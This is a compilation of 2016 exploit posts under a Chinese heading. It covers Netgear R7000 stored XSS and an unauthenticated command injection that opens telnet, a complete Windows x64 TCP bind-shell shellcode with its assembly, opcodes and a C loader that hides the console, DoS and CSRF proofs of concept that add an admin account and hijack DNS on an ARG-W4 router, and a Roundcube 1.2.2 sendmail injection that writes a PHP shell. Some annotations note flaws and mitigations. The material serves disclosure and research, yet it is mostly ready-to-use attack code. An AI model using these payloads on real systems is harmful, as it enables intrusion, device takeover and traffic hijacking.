Netgear R7000/R6400路由器远程漏洞等

# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date
  
-Vulnerability
A user who can send DHCP over either a VPN or a wireless connection can serve a host name containing script tags to trigger XSS.
 
This could potentially be used to connect to an open or guest Wi-Fi hotspot, inject stored XSS into the admin panel, and steal the authentication cookie.
 
http://RouterIP/start.htm
 
Then visit the "view who's connected" page.
  
-Proof Of Concept
Set /etc/dhcp/dhclient.conf
 

send host-name "<script>alert('xss')</script>";




# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
 
-Vulnerability
An unauthenticated user can inject commands through
http://RouterIP/cgi-bin/;COMMAND.
 
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.



/*
     # Title : Windows x64 Bind Shell TCP Shellcode
     # size : 508 bytes
     # Date : 08-12-2016
     # Author : Roziul Hasan Khan Shifat
     # Tested On : Windows 7 Professional x64
 
 
 
*/
 
 
/*
 
section .text
;-----------------------------------------------------------------------
; _start - Windows x64 TCP bind shell (NASM / Intel syntax; the page
; header says it was tested on Windows 7 Professional x64).
;
; Register roles (all set below):
;   r14 = base of the module reached through the gs:[0x60] pointer chain
;   rsi = that module's export address table (32-bit RVAs)
;   r15 = base returned by LoadLibraryA("ws2_32")
;   rdi = ws2_32's export address table
;   r12 = 128-byte scratch area on the stack (DLL name, sockaddr_in,
;         STARTUPINFOA, PROCESS_INFORMATION all live here in turn)
;   r13 = listening SOCKET
;
; Reviewer notes:
; * Every API is located by a hard-coded position in an export table
;   (entries 832, 114, 98, 165, 297 and byte offsets 0, 4, 48, 80), not
;   by name, so the code only works against the exact DLL builds it was
;   tested with.
; * The 88-byte rsp adjustments are odd multiples of 8, so rsp alignment
;   flips at each one and several of the later calls run with
;   rsp == 8 (mod 16); not ABI-clean even where it ran in testing.
; * No return value is checked (WSAStartup, WSASocketA, setsockopt, bind,
;   listen, accept, CreateProcessA).
; * Observable behaviour for detection: ws2_32 loaded by code outside any
;   mapped image, a new listener on TCP 4444, and a cmd child whose
;   standard handles are inherited from a socket.
;-----------------------------------------------------------------------
     global _start
_start:

; Pointer chase starting at gs:[0x60]. The result in r14 is treated as an
; image base below (r14+0x3c is read, RVAs are rebased with add r14), so
; this presumably walks the loader's module list; which module it lands on
; (kernel32 per the author's later comments) cannot be verified from here.
xor rdx,rdx
mov rax,[gs:rdx+0x60]
mov rsi,[rax+0x18]
mov rsi,[rsi+0x10]
lodsq
mov rsi,[rax]
mov r14,[rsi+0x30]

;----------------------
; PE export walk: e_lfanew at base+0x3c, export directory RVA at
; NT headers+0x88 (PE32+ data directory 0), AddressOfFunctions at
; export directory+0x1c.
mov dl,0x88
mov ebx,[r14+0x3c]
add rbx,r14
mov ebx,[rbx+rdx]
add rbx,r14

;--------------------------
mov esi,[rbx+0x1c]
add rsi,r14 ;export address table of the r14 module (the author's original
            ;comment called this the kernel32 base; the base itself is r14)

;-------------------------------
; Entry 832 of the table, 4 bytes per RVA: LoadLibraryA per the author.
mov dx,832
mov ebx,[rsi+rdx*4]
add rbx,r14 ;LoadLibraryA()
;-------------------------------

; 128-byte scratch area; r12 keeps its address for the rest of the code.
mov dl,128
sub rsp,rdx
lea r12,[rsp]

;----------------------------------------------------
;loading ws2_32.dll
; "ws2_" + "32" + NUL (dl is 0 after the xor) -> "ws2_32" at [r12].
; The 88 bytes taken before the call cover the 32-byte shadow space the
; Microsoft x64 ABI makes the caller reserve.
xor rdx,rdx

mov [r12],dword 'ws2_'
mov [r12+4],word '32'
mov [r12+6],byte dl

lea rcx,[r12]

sub rsp,88

call rbx

mov r15,rax ;ws2_32.dll base address
;--------------------------------------------------
; Same export walk on the ws2_32 image; rdi = its address table.
xor rdx,rdx
mov dl,0x88
mov ebx,[r15+0x3c]
add rbx,r15
mov ebx,[rbx+rdx]
add rbx,r15

mov edi,[rbx+0x1c]
add rdi,r15

;------------------------------
; Entry 114: WSAStartup per the author.
mov dx,114*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSAStartup()

;-----------------------------------
;WSAStartup(514,&WSADATA)
; 408 bytes of stack serve as the WSADATA out-parameter (rdx);
; 514 = 0x0202 requests Winsock version 2.2.
xor rcx,rcx
mov cx,408

sub rsp,rcx
lea rdx,[rsp]
mov cx,514

sub rsp,88

call rbx

;-------------------------------------------
; Entry 98: WSASocketA per the author.
xor rdx,rdx
mov dx,98*4
mov ebx,[rdi+rdx]
add rbx,r15 ;WSASocketA()

;WSASocket(2,1,6,0,0,0)
; rcx=2 (AF_INET), rdx=1 (SOCK_STREAM), r8=6 (IPPROTO_TCP); r9 and the
; two stack arguments at [rsp+32]/[rsp+40] are 0 - a plain TCP socket.
push 6
push 1
push 2

pop rcx
pop rdx
pop r8

xor r9,r9

mov [rsp+32],r9
mov [rsp+40],r9

call rbx

mov r13,rax ;SOCKET (never compared against INVALID_SOCKET)
;--------------------------------------------
; Byte offset 80 (entry 20): setsockopt per the author.
mov ebx,[rdi+80]
add rbx,r15 ;setsockopt()

;setsockopt(SOCKET,0xffff,4,&1,4)
; level 0xffff = SOL_SOCKET, option 4 = SO_REUSEADDR, optlen = 4.
; Only the low byte of optval at [rsp] is written; the other three bytes
; of the 4-byte value are whatever the stack already held there.
xor rdx,rdx
mov rcx,r13
mov dx,0xffff

push 4

pop r8

mov [rsp],byte 1
lea r9,[rsp]

sub rsp,88
mov  [rsp+32],r8

call rbx

;--------------------------------------------------
; Byte offset 4 (entry 1): bind per the author.
mov ebx,[rdi+4]
add rbx,r15 ;bind()

;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
; sockaddr_in built at [r12]: 16 bytes zeroed, sin_family = 2 (AF_INET),
; sin_port stored as bytes 11 5c = htons(4444); sin_addr stays 0
; (INADDR_ANY), so the listener is reachable on every interface.
push 16
pop r8

xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov [r12],byte 2
mov [r12+2],word 0x5c11 ;port 4444 (change it if U want)
lea rdx,[r12]

mov rcx,r13

call rbx
;----------------------------------------
; Byte offset 48 (entry 12): listen per the author.
mov ebx,[rdi+48]
add rbx,r15 ;listen()

;listen(SOCKET,1)
push 1
pop rdx

push r13
pop rcx

call rbx

;-----------------------------------
; Byte offset 0 (entry 0): accept per the author.
mov ebx,[rdi]
add rbx,r15 ;accept()

;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
; Blocks until a client connects. addrlen (16) is pushed and its address
; passed in r8; the accepted socket comes back in rax and is used as the
; child's standard handles below.
xor rdx,rdx

mov [r12],rdx
mov [r12+8],rdx

mov dl,16
push rdx

lea r8,[rsp]

lea rdx,[r12]

mov rcx,r13

sub rsp,88
call rbx

;-------------------------------------------
; STARTUPINFOA at [r12] (x64 layout: cb at 0, dwFlags at 0x3c,
; hStdInput/hStdOutput/hStdError at 0x50/0x58/0x60):
; cb = 104 (0x68), dwFlags = 256 (STARTF_USESTDHANDLES), all three
; standard handles = the accepted socket still in rax.
; Bytes 0x20-0x3b and 0x40-0x4f of the structure are never written and
; keep whatever the scratch area held; CreateProcessA appears to tolerate
; that when the corresponding flags are clear, but it is not initialised.
xor rdx,rdx
mov [r12],rdx
mov [r12+8],rdx

mov dl,104

xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx

mov dl,255
inc rdx

mov [r12+0x3c],edx
mov [r12+0x50],rax
mov [r12+0x58],rax
mov [r12+0x60],rax

;--------------------------------------------------
; "cmdA" written just below the buffer, then its last byte replaced by
; cl (0) -> the NUL-terminated command line "cmd".
mov [r12-4],dword 'cmdA'
mov [r12-1],byte cl

;-----------------------------------------
sub rsp,88
;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
; rcx is still 0 from the xor above (lpApplicationName = NULL).
; bInheritHandles: only one byte of the 4-byte BOOL slot at [rsp+32] is
; written; the upper three bytes are stale stack contents.
; PROCESS_INFORMATION is placed directly after STARTUPINFOA, at r12+104.

lea rdx,[r12-4] ;"cmd"

xor r8,r8 ;NULL

push r8
pop r9 ;NULL

mov [rsp+32],byte 1 ;TRUE
mov [rsp+40],r8 ;0
mov [rsp+48],r8 ;NULL
mov [rsp+56],r8 ;NULL

lea rax,[r12]
mov [rsp+64],rax

lea rax,[r12+104]
mov [rsp+72],rax

; Entry 165 of the first module's table: CreateProcessA per the author.
xor r10,r10
mov r10w,165*4
mov ebx,[rsi+r10]
add rbx,r14 ;CreateProcessA()

call rbx

;-----------------------------------------------
; Entry 297 of the same table, called with rcx = 1; the author does not
; name it. NOTE(review): looks like an exit-style call (exit code 1) - the
; code does not return - unverified.
; r10 is a volatile register under the Microsoft x64 ABI, so after the
; call above only its low 16 bits are reloaded here; the upper bits are
; whatever the callee left. It worked in testing, but it is not
; guaranteed by the ABI.
mov r10w,297*4
mov ebx,[rsi+r10]
add rbx,r14

push 1
pop rcx

add rsp,88
call rbx
 
 
 
 
*/
 
 
 
/*
 
 
      file format pe-x86-64
 
 
Disassembly of section .text:
 
0000000000000000 <_start>:
    0:   48 31 d2                xor    %rdx,%rdx
    3:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
    8:   48 8b 70 18             mov    0x18(%rax),%rsi
    c:   48 8b 76 10             mov    0x10(%rsi),%rsi
   10:   48 ad                   lods   %ds:(%rsi),%rax
   12:   48 8b 30                mov    (%rax),%rsi
   15:   4c 8b 76 30             mov    0x30(%rsi),%r14
   19:   b2 88                   mov    $0x88,%dl
   1b:   41 8b 5e 3c             mov    0x3c(%r14),%ebx
   1f:   4c 01 f3                add    %r14,%rbx
   22:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
   25:   4c 01 f3                add    %r14,%rbx
   28:   8b 73 1c                mov    0x1c(%rbx),%esi
   2b:   4c 01 f6                add    %r14,%rsi
   2e:   66 ba 40 03             mov    $0x340,%dx
   32:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
   35:   4c 01 f3                add    %r14,%rbx
   38:   b2 80                   mov    $0x80,%dl
   3a:   48 29 d4                sub    %rdx,%rsp
   3d:   4c 8d 24 24             lea    (%rsp),%r12
   41:   48 31 d2                xor    %rdx,%rdx
   44:   41 c7 04 24 77 73 32    movl   $0x5f327377,(%r12)
   4b:   5f
   4c:   66 41 c7 44 24 04 33    movw   $0x3233,0x4(%r12)
   53:   32
   54:   41 88 54 24 06          mov    %dl,0x6(%r12)
   59:   49 8d 0c 24             lea    (%r12),%rcx
   5d:   48 83 ec 58             sub    $0x58,%rsp
   61:   ff d3                   callq  *%rbx
   63:   49 89 c7                mov    %rax,%r15
   66:   48 31 d2                xor    %rdx,%rdx
   69:   b2 88                   mov    $0x88,%dl
   6b:   41 8b 5f 3c             mov    0x3c(%r15),%ebx
   6f:   4c 01 fb                add    %r15,%rbx
   72:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
   75:   4c 01 fb                add    %r15,%rbx
   78:   8b 7b 1c                mov    0x1c(%rbx),%edi
   7b:   4c 01 ff                add    %r15,%rdi
   7e:   66 ba c8 01             mov    $0x1c8,%dx
   82:   8b 1c 17                mov    (%rdi,%rdx,1),%ebx
   85:   4c 01 fb                add    %r15,%rbx
   88:   48 31 c9                xor    %rcx,%rcx
   8b:   66 b9 98 01             mov    $0x198,%cx
   8f:   48 29 cc                sub    %rcx,%rsp
   92:   48 8d 14 24             lea    (%rsp),%rdx
   96:   66 b9 02 02             mov    $0x202,%cx
   9a:   48 83 ec 58             sub    $0x58,%rsp
   9e:   ff d3                   callq  *%rbx
   a0:   48 31 d2                xor    %rdx,%rdx
   a3:   66 ba 88 01             mov    $0x188,%dx
   a7:   8b 1c 17                mov    (%rdi,%rdx,1),%ebx
   aa:   4c 01 fb                add    %r15,%rbx
   ad:   6a 06                   pushq  $0x6
   af:   6a 01                   pushq  $0x1
   b1:   6a 02                   pushq  $0x2
   b3:   59                      pop    %rcx
   b4:   5a                      pop    %rdx
   b5:   41 58                   pop    %r8
   b7:   4d 31 c9                xor    %r9,%r9
   ba:   4c 89 4c 24 20          mov    %r9,0x20(%rsp)
   bf:   4c 89 4c 24 28          mov    %r9,0x28(%rsp)
   c4:   ff d3                   callq  *%rbx
   c6:   49 89 c5                mov    %rax,%r13
   c9:   8b 5f 50                mov    0x50(%rdi),%ebx
   cc:   4c 01 fb                add    %r15,%rbx
   cf:   48 31 d2                xor    %rdx,%rdx
   d2:   4c 89 e9                mov    %r13,%rcx
   d5:   66 ba ff ff             mov    $0xffff,%dx
   d9:   6a 04                   pushq  $0x4
   db:   41 58                   pop    %r8
   dd:   c6 04 24 01             movb   $0x1,(%rsp)
   e1:   4c 8d 0c 24             lea    (%rsp),%r9
   e5:   48 83 ec 58             sub    $0x58,%rsp
   e9:   4c 89 44 24 20          mov    %r8,0x20(%rsp)
   ee:   ff d3                   callq  *%rbx
   f0:   8b 5f 04                mov    0x4(%rdi),%ebx
   f3:   4c 01 fb                add    %r15,%rbx
   f6:   6a 10                   pushq  $0x10
   f8:   41 58                   pop    %r8
   fa:   48 31 d2                xor    %rdx,%rdx
   fd:   49 89 14 24             mov    %rdx,(%r12)
  101:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  106:   41 c6 04 24 02          movb   $0x2,(%r12)
  10b:   66 41 c7 44 24 02 11    movw   $0x5c11,0x2(%r12)
  112:   5c
  113:   49 8d 14 24             lea    (%r12),%rdx
  117:   4c 89 e9                mov    %r13,%rcx
  11a:   ff d3                   callq  *%rbx
  11c:   8b 5f 30                mov    0x30(%rdi),%ebx
  11f:   4c 01 fb                add    %r15,%rbx
  122:   6a 01                   pushq  $0x1
  124:   5a                      pop    %rdx
  125:   41 55                   push   %r13
  127:   59                      pop    %rcx
  128:   ff d3                   callq  *%rbx
  12a:   8b 1f                   mov    (%rdi),%ebx
  12c:   4c 01 fb                add    %r15,%rbx
  12f:   48 31 d2                xor    %rdx,%rdx
  132:   49 89 14 24             mov    %rdx,(%r12)
  136:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  13b:   b2 10                   mov    $0x10,%dl
  13d:   52                      push   %rdx
  13e:   4c 8d 04 24             lea    (%rsp),%r8
  142:   49 8d 14 24             lea    (%r12),%rdx
  146:   4c 89 e9                mov    %r13,%rcx
  149:   48 83 ec 58             sub    $0x58,%rsp
  14d:   ff d3                   callq  *%rbx
  14f:   48 31 d2                xor    %rdx,%rdx
  152:   49 89 14 24             mov    %rdx,(%r12)
  156:   49 89 54 24 08          mov    %rdx,0x8(%r12)
  15b:   b2 68                   mov    $0x68,%dl
  15d:   48 31 c9                xor    %rcx,%rcx
  160:   41 89 14 24             mov    %edx,(%r12)
  164:   49 89 4c 24 04          mov    %rcx,0x4(%r12)
  169:   49 89 4c 24 0c          mov    %rcx,0xc(%r12)
  16e:   49 89 4c 24 14          mov    %rcx,0x14(%r12)
  173:   49 89 4c 24 18          mov    %rcx,0x18(%r12)
  178:   b2 ff                   mov    $0xff,%dl
  17a:   48 ff c2                inc    %rdx
  17d:   41 89 54 24 3c          mov    %edx,0x3c(%r12)
  182:   49 89 44 24 50          mov    %rax,0x50(%r12)
  187:   49 89 44 24 58          mov    %rax,0x58(%r12)
  18c:   49 89 44 24 60          mov    %rax,0x60(%r12)
  191:   41 c7 44 24 fc 63 6d    movl   $0x41646d63,-0x4(%r12)
  198:   64 41
  19a:   41 88 4c 24 ff          mov    %cl,-0x1(%r12)
  19f:   48 83 ec 58             sub    $0x58,%rsp
  1a3:   49 8d 54 24 fc          lea    -0x4(%r12),%rdx
  1a8:   4d 31 c0                xor    %r8,%r8
  1ab:   41 50                   push   %r8
  1ad:   41 59                   pop    %r9
  1af:   c6 44 24 20 01          movb   $0x1,0x20(%rsp)
  1b4:   4c 89 44 24 28          mov    %r8,0x28(%rsp)
  1b9:   4c 89 44 24 30          mov    %r8,0x30(%rsp)
  1be:   4c 89 44 24 38          mov    %r8,0x38(%rsp)
  1c3:   49 8d 04 24             lea    (%r12),%rax
  1c7:   48 89 44 24 40          mov    %rax,0x40(%rsp)
  1cc:   49 8d 44 24 68          lea    0x68(%r12),%rax
  1d1:   48 89 44 24 48          mov    %rax,0x48(%rsp)
  1d6:   4d 31 d2                xor    %r10,%r10
  1d9:   66 41 ba 94 02          mov    $0x294,%r10w
  1de:   42 8b 1c 16             mov    (%rsi,%r10,1),%ebx
  1e2:   4c 01 f3                add    %r14,%rbx
  1e5:   ff d3                   callq  *%rbx
  1e7:   66 41 ba a4 04          mov    $0x4a4,%r10w
  1ec:   42 8b 1c 16             mov    (%rsi,%r10,1),%ebx
  1f0:   4c 01 f3                add    %r14,%rbx
  1f3:   6a 01                   pushq  $0x1
  1f5:   59                      pop    %rcx
  1f6:   48 83 c4 58             add    $0x58,%rsp
  1fa:   ff d3                   callq  *%rbx
 
 
 
 
 
*/
 
 
 
 
 
 
 
 
 
#include<windows.h>
#include<stdio.h>
#include<string.h>
 
 
char shellcode[]=\
 
"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x4c\x8b\x76\x30\xb2\x88\x41\x8b\x5e\x3c\x4c\x01\xf3\x8b\x1c\x13\x4c\x01\xf3\x8b\x73\x1c\x4c\x01\xf6\x66\xba\x40\x03\x8b\x1c\x96\x4c\x01\xf3\xb2\x80\x48\x29\xd4\x4c\x8d\x24\x24\x48\x31\xd2\x41\xc7\x04\x24\x77\x73\x32\x5f\x66\x41\xc7\x44\x24\x04\x33\x32\x41\x88\x54\x24\x06\x49\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x49\x89\xc7\x48\x31\xd2\xb2\x88\x41\x8b\x5f\x3c\x4c\x01\xfb\x8b\x1c\x13\x4c\x01\xfb\x8b\x7b\x1c\x4c\x01\xff\x66\xba\xc8\x01\x8b\x1c\x17\x4c\x01\xfb\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x66\xba\x88\x01\x8b\x1c\x17\x4c\x01\xfb\x6a\x06\x6a\x01\x6a\x02\x59\x5a\x41\x58\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd3\x49\x89\xc5\x8b\x5f\x50\x4c\x01\xfb\x48\x31\xd2\x4c\x89\xe9\x66\xba\xff\xff\x6a\x04\x41\x58\xc6\x04\x24\x01\x4c\x8d\x0c\x24\x48\x83\xec\x58\x4c\x89\x44\x24\x20\xff\xd3\x8b\x5f\x04\x4c\x01\xfb\x6a\x10\x41\x58\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\x41\xc6\x04\x24\x02\x66\x41\xc7\x44\x24\x02\x11\x5c\x49\x8d\x14\x24\x4c\x89\xe9\xff\xd3\x8b\x5f\x30\x4c\x01\xfb\x6a\x01\x5a\x41\x55\x59\xff\xd3\x8b\x1f\x4c\x01\xfb\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x10\x52\x4c\x8d\x04\x24\x49\x8d\x14\x24\x4c\x89\xe9\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x49\x89\x14\x24\x49\x89\x54\x24\x08\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x49\x89\x44\x24\x50\x49\x89\x44\x24\x58\x49\x89\x44\x24\x60\x41\xc7\x44\x24\xfc\x63\x6d\x64\x41\x41\x88\x4c\x24\xff\x48\x83\xec\x58\x49\x8d\x54\x24\xfc\x4d\x31\xc0\x41\x50\x41\x59\xc6\x44\x24\x20\x01\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x49\x8d\x04\x24\x48\x89\x44\x24\x40\x49\x8d\x44\x24\x68\x48\x89\x44\x24\x48\x4d\x31\xd2\x66\x41\xba\x94\x02\x42\x8b\x1c\x16\x4c\x01\xf3\xff\xd3\x66\x41\xba\xa4\x04\x42\x8b\x1c\x16\x4c\x01\xf3\x6
a\x01\x59\x48\x83\xc4\x58\xff\xd3" ;
 
 
int main()
{
/* Test harness for the byte string above: marks it executable, hides the
 * console window, then jumps into it. Returns 0 only if control ever
 * comes back, which the listing's final call does not suggest.
 *
 * Reviewer notes:
 * - strlen() gives the right length only because the literal contains no
 *   0x00 byte; a NUL anywhere would silently truncate the copy that runs.
 * - As printed on this page the literal is wrapped mid-escape ("\x6" at
 *   the end of one line, "a\x01..." at the start of the next); the
 *   disassembly shows the byte is 6a. The two lines must be rejoined
 *   before this compiles.
 * - VirtualProtect's return value is ignored; if the protection change
 *   fails (e.g. a policy that forbids RWX pages) the indirect call below
 *   faults instead of reporting the failure.
 * - An RWX page in a data section plus a console hidden right after
 *   AllocConsole() are exactly the behaviours host-based defences key on.
 */
int len= strlen (shellcode);
DWORD l=0;                /* receives the previous protection of the page */
printf ( "shellcode length : %d\n" ,len);

//making memory executable (PAGE_EXECUTE_READWRITE over the array's page)
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);


//hiding windows: 0 is SW_HIDE

AllocConsole();
ShowWindow(FindWindowA( "ConsoleWindowClass" ,NULL),0);

// Treat the array as a function and transfer control to it.

(* ( int (*)()) shellcode)();

return 0;

}








# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
 
1 - Denial of Service
 
#!/usr/bin/python
# Python 2 script (urllib2 / raw_input). Sends one POST to the router's
# form2Upnp.cgi using HTTP basic-auth with the fixed credentials admin/admin.
#
# Reviewer notes:
# - The bare except prints the same "Done" message as the success path, so a
#   connection error, a 401 or a 404 is indistinguishable from a successful
#   request; it also swallows KeyboardInterrupt.
# - The URL typed by the user is used verbatim (no scheme or trailing-slash
#   handling) and the response object is never read.
# - Device-side mitigation for this class of issue is server-side validation
#   of form input and not shipping a fixed default password.
import urllib2
import urllib
 
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
 
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
     html = urllib2.urlopen(site,data)   # response is never inspected
     print ("Done ! c_C")
except:                                  # catches everything, including Ctrl-C
     print ("Done ! c_C")
     
2-1 Cross-Site Request Forgery (Add Admin)
 
<!-- CSRF proof of concept: a plain cross-origin form POST to the router's
     form2userconfig.cgi that adds a user with privilege 2 ("Add Admin" in
     the page heading). It works because the request carries no anti-CSRF
     token and relies only on the browser's ambient session/credentials.
     The "&#46;" / "&#63;" entities in the last hidden field decode to
     "." and "?" (submit.htm?userconfig.htm). The typo type="texr" on the
     confirm field is harmless: browsers fall back to a text input.
     Mitigation: per-session CSRF tokens and Origin/Referer checks on every
     state-changing CGI endpoint. -->
<html>
   <body>
     <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
       USER:<input type="text" name="username" value="mobham" />
       <input type="hidden" name="privilege" value="2" />
       PWD:<input type="text" name="newpass" value="mobham" />
       RPWD:<input type="texr" name="confpass" value="mobham" />
       <input type="hidden" name="adduser" value="Add" />
       <input type="hidden" name="hiddenpass" value="" />
       <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
 
2-2 Cross-Site Request Forgery (Change DNS)
 
<!-- CSRF proof of concept: a cross-origin form POST to form2Dns.cgi that
     switches the router to manual DNS (dnsMode=1) and sets the servers to
     2.2.2.2 and 1.1.1.1 (the "&#46;" entities decode to dots; "&#32;" is a
     space). Because every client behind the router inherits its DNS
     settings, this is a device-wide DNS hijack triggered by one victim
     visiting an attacker page while logged in. Same root cause and
     mitigation as the form above: no anti-CSRF token; add one and verify
     Origin/Referer on state-changing requests. -->
<html>
   <body>
     <form action="http://192.168.1.1/form2Dns.cgi" method="POST">
       <input type="hidden" name="dnsMode" value="1" />
       DNS<input type="text" name="dns1" value="2&#46;2&#46;2&#46;2" />
       DNS 2<input type="text" name="dns2" value="1&#46;1&#46;1&#46;1" />
       DNS 3<input type="text" name="dns3" value="" />
       <input type="hidden" name="submit&#46;htm&#63;dns&#46;htm" value="Send" />
       <input type="hidden" name="save" value="Apply&#32;Changes" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>


Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
 
Found by Robin Peraglie with RIPS
 
Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.
 
Affected Versions: 1.0.0 - 1.2.2
 
Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot
 
Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows additional arguments to be passed to this
execution, which in turn allows sendmail to be configured. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.
 
program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
⋮  
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************
 
Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.
 
program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
    
     if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
         $sent = mail($to, $subject, $msg_body, $header_str);
     else
         $sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************
 
This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.
 
Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.
 
********************************************************************************
example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************
 
This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:
 
********************************************************************************
04731 >>> Recipient names must be specified
04731 <<< To: squinty@localhost
04731 <<< Subject: <?php phpinfo(); ?>
04731 <<< X-PHP-Originating-Script: 1000:rcube.php
04731 <<< MIME-Version: 1.0
04731 <<< Content-Type: text/plain; charset=US-ASCII;
04731 <<<  format=flowed
04731 <<< Content-Transfer-Encoding: 7bit
04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
04731 <<< From: example@example.com -OQueueDirectory=/tmp
04731 <<<  -X/var/www/html/rce.php
04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
04731 <<<  -X/var/www/html/rce.php
04731 <<< User-Agent: Roundcube Webmail/1.2.2
04731 <<<
04731 <<< Funny e-mail message
04731 <<< [EOF]
********************************************************************************
 
Since the email data is unencoded, the subject parameter is reflected in
plaintext, which allows the injection of PHP tags into the shell file.
 
Time Line
---------
* 2016/11/21: First contact with vendor
* 2016/11/28: Vendor agrees to coordinated disclosure
* 2016/11/28: Vendor releases updated version Roundcube 1.2.3
